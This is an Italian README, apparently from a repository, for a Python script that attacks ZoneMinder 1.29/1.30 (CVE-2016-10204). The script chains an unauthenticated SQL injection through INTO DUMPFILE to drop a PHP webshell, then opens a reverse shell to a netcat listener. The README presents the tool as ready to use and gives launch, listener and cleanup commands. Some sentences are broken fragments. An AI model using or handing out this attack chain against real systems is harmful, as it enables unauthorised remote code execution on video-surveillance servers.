
SQL injection non autenticata per exploit RCE per ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC in Python con singolo comando da SQLi a webshell a reverse shell.
Un exploit Python pronto all'uso per ZoneMinder 1.29/1.30 che concatena la SQL injection non autenticata (CVE-2016-10204, EDB-41239) fino ad arrivare a una reverse shell interattiva.
Questo è un PoC weaponized/automatizzato per una CVE nota e già corretta, non un nuovo exploit.
Il PoC EDB per questo bug si ferma al payload SQLi o al "punta sqlmap contro di esso". Questo exploit impacchetta l'intera catena SQLi to webshell to shell in un unico script leggibile.
SLEEP) sul parametro POST
limit di index.php?view=request&request=log&task=query.SELECT ... INTO DUMPFILE,
provando diversi percorsi comuni di ZoneMinder/Apache.bash verso il tuo
listener netcat.DUMPFILE, non OUTFILE. OUTFILE esegue l'escape dei newline e rovina
il PHP multi-riga; DUMPFILE scrive byte grezzi, quindi la webshell rimane valida.# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443
# start your listener when prompted, in another terminal
sudo nc -lvnp 443
# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php
MIT, vedi LICENSE.